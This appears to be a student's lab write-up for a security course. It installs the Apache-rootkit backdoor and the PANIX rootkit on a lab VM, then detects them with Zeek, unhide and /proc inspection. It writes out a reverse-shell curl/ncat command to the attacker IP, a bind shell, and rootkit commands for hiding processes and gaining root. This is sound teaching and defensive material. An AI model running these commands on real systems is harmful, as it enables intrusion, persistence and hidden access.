Lab 10 ‐ Exploring Linux Rootkits and Process Hiding Techniques - jacobwilliams100/sec-440 GitHub Wiki

I am competing this lab on ubuntu-lan

Part #1 - Installing and Using Apache-rootkit

Start by updating the system and installing apache with:

sudo apt update

and

sudo apt install apache2 apache2-dev apache2-utils ncat

{8C7722E1-7F27-4405-A599-F65D080F7041}

and navigate to the /tmp directory with cd /tmp

{684C3062-EBF7-460C-B980-9B74264D79E7}

Now download the Apache-rootkit code manually by using firefox to visit https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Rootkits/Rootkit.Linux.Apache-rootkit.7z and downloading it

image

Move it to /tmp/

and extract the rootkit using 7z:

sudo 7z e Rootkit.Linux.Apache-rootkit.7z

(install 7 with sudo apt install p7zip-full if you don't have it already)

image

Compile the rootkit with sudo apxs -c -i mod_authg.c

image

Now modify /etc/apache2/apache2.conf and add the following lines:

image

save, quit, and sudo systemctl restart apache2

Now install lynx with sudo apt install lynx

And do a test with lynx -mime_header http://localhost/authg?c=id

Your result should look something like this:

Deliverable #1: Submit a screenshot showing your results similar to the screenshot below.

image

From the Kali VM, enter the following command: curl http://(your-ubuntu-ip)/authg?c=hostname

The result should display the Ubuntu VM's hostname

image

Part #2 - Shell Access using Apache Backdoor

On the Kali VM, open a new terminal and enter nc -vnlp 5555

image

Open another terminal and enter curl http://(ubuntu-ip-address)/authg?c='/bin/sh|%20ncat%20(kali-ip-address)%205555%20-e%20/bin/bash'

image

Don't forget to substitute in your own IP addresses!

You should see that you now have a connection to the Ubuntu system

image

Using the shell access you have now gained; run the whoami and ls commands.

I ran ip a as well, to make sure that I was on the Ubuntu host's IP (10.0.5.6)

Deliverable #2: Submit a screenshot showing your results of the commands above.

image

Part #3 - Zeek to Save the Day

Use your Zeek instance to find the malicious communications that were done in the previous tasks.

To make this easier, I started a capture, and repeated these steps.

image

image

image

Deliverable #3: Submit screenshot(s) with explanations on how you detected the activity above using Zeek.

Since the curl command uses HTTP, it is safe to assume that this will create some HTTP traffic for us to analyze, so we will look in http.log first with cat http.log | column -t | less -S

As with the previous labs, the columns are offset one to the right, but as of right now, this is the cleanest way I have found to view entire Zeek logs.

In http.log we find the connection that kali (10.0.5.110) made to xubuntu (10.0.5.6)

We also see that it connected using the uri string /auth?c=bin/sh| which we used to open that shell earlier

image

We can also see that it used ncat, and opened a bash shell

image

We can find a little bit about the connection in conn.log as well, check it with cat conn.log | column -t | less -S

image

Part #4 - Installing and Using PANIX for Persistence

Back on the Ubuntu VM, download PANIX with:

curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh

and set the permissions to allow execution with chmod +x panix.sh

image

Then deploy the rootkit with:

sudo ./panix.sh --rootkit --secret "P4N1X" --identifier "panix"

Deliverable #4: Submit a screenshot with the output of the rootkit installation. This should show how to hide a process and how to gain root access.

image

image

It tells us that we can hide a process with kill -31 pid and become root with kill -64 pid

Part #5 - Hiding a Process with PANIX

In a new Terminal, start a ncat backdoor process with ncat -lvp 4444 -e /bin/bash &

image

Then in yet another terminal, enter sudo netstat -plnt | grep 4444 to find the pid for the ncat process

image

This tells us the pid for ncat is 15546

Based on the command we found in Part #4, we can hide the ncat process with kill -31 15546

Then if we run the netstat command again, we can see that the process is now hidden!

Deliverable #5: Submit a screenshot of hiding the ncat process and then using the netstat process to prove that it is now hidden and no longer in the netstat output.

image

Part #6 - Detecting Hidden Processes

Now we will go over methods of finding hidden processes

First let’s try out the unhide tool.

First install it with sudo apt install unhide

Then run it with sudo unhide proc

It managed to find the hidden pid!

Deliverable #6: Submit a screenshot proving unhide was able to find your hidden processes.

image

Now we will try /proc instead. To check all the processes that have a listening socket. To do this, run sudo cat /proc/net/tcp

image

This seemed pretty hard to read at first, until I realized that they were all hex values. Based on setting up the ncat earlier, we know it is running on port 4444. Converting 4444 to hex results in 115C

image

There is a line in /proc/net/tcp that has this number, and based on the context (being a smaller string after "local address") we can tell that it is a port, meaning that it matches this line.

image

This means that the inode value is 463960.

From using unhide we already know the pid is 15546

So we will navigate to /proc/15546/fd, and we find 4 files here

image

We do ls -l to give some details from each of these files

Deliverable #7: Submit a screenshot highlighting the inode # of the socket of interest.

image

File descriptor 4 contains the text 'socket:[463960]' which is also the inode number listed for the ncat process in /proc/net/tcp.

Deliverable #8: Explain your findings.

As I stated: I searched for 4444 in hex, which is 115C. There was a line in /proc/net/tcp that matched this port value. That line also included an inode value of 463960. I already knew the PID (15546). Then I just had to go to /proc/15546/fd and running ls -l to find which file descriptor contained a matching inode (463960). This lead me to file descriptor 4. So the full path to the ncat's file descriptor is ```/proc/15546/fd/4

We can gain a bit more information about this file descriptor with stat

image

Part #7 – Reflection

I rarely see Linux malware discussed, and while it may not be quite as common as Windows malware, it is definitely an issue, specifically in targeted attacks like the one we simulated here. I had no idea it was so easy to hide processes in a normal Linux environment, and the challenge it introduces when trying to eliminate a persistent threat. This lab was pretty easy until step 6, which was kind of challenging but eventually I figured it out by using some web resources and searching for patterns in the /proc/net/tcp file. It was kind of like a fun puzzle. I also ran into an issue unzipping the rootkit folder in step 1, but I resolved that by just downloading it manually using firefox instead of wget. I feel that I now have a basic understanding on hiding and finding processes in a Linux environment. I will definitely be using the unhide application in the future.